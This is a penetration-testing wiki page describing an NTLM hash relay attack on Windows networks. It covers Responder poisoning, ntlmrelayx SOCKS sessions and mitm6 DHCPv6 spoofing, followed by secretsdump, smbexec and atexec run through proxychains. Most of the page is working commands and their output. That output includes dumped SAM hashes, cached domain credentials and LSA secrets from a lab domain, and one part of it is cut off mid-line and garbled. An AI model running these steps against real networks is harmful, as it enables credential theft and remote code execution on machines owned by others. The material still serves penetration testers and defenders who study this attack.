Comment on page
SMB Relay
This page deals with gaining code execution relaying NTLMv1/2 hashes in a very effective manner.
- crack it to retrieve cleartext passwords
- relay it to gain code execution on a target
The relayed user must have privilege on the target.
In order to relay hashes, we must have valid targets. Valid targets are machines with SMB Signing disabled.
SMB Signing is disabled by default on every Windows OS, except Windows Server.
cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt
[Responder Core]
; Servers to start
SQL = On
SMB = Off # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off # Turn this off
HTTPS = On
DNS = On
LDAP = On
Then fire up Responder:
python Responder.py -I <interface> -r -d -w
Instead of cracking Responder hashes, we can relay it to our valid targets to gain code execution on it. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.
With ntlmrelayx, you can use and reuse sessions instead of executing a one-shot attack.
One-Shot Attack vs Socks Support.
To use SOCKS support, simply use -sock switch:
./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support
Since MS08-068, it is impossible to relay a hash back to the machine it comes from (reflective attack).
Until now, we have abused LLMNR protocol to capture NTLMv2 hashes. It works great, but we can increase the effectiveness of hash relaying by abusing IPv6 protocol too.
The idea is to reply to DHCPv6 requests made by machines on the network to set the attacker IP as the default IPv6 DNS server in order to force victims to authenticate against our attacker machine because of the IPv6 priority over IPv4 in Windows.
Abusing IPv6 protocol with mitm6.
To use mitm6:
sudo mitm6 -d <domain>
To minimize the impact on the network, the lease will expire within 5 minutes when mitm6 is stopped, which will remove the DNS server from the victims configuration.
Many sessions will be established by chaining these exploits:
ntlmrelayx> socks
Protocol Target Username Port
-------- -------------- ------------------------ ----
SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25
SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25
IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143
...
To interact with these sessions, you need to edit /etc/proxychains.conf:
[ProxyList]
socks4 <yourIP> 1080
You can type anything when you are prompted for a password.
root@kalibeto # proxychains ./secretsdump.py vulnerable/[email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+......
0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|..
0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u....
0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
psexec or wmiexec do not work here (see references).
You can use SMBClient:
root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017
Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009
pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Fri Dec 1 17:16:28 2017
Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017
ProgramData DH 0 Tue Feb 27 15:02:13 2018
Recovery DHS 0 Wed Sep 30 18:00:31 2015
System Volume Information DHS 0 Wed Jun 6 12:24:46 2018
tmp D 0 Sun Mar 25 09:49:15 2018
Users DR 0 Thu Dec 7 19:07:54 2017
Windows D 0 Tue Feb 27 16:25:59 2018
5216767 blocks of size 4096. 609996 blocks available
smb: \>
Many other protocols can be relayed: imap, ldap, mssql, etc (see references).
Last modified 4yr ago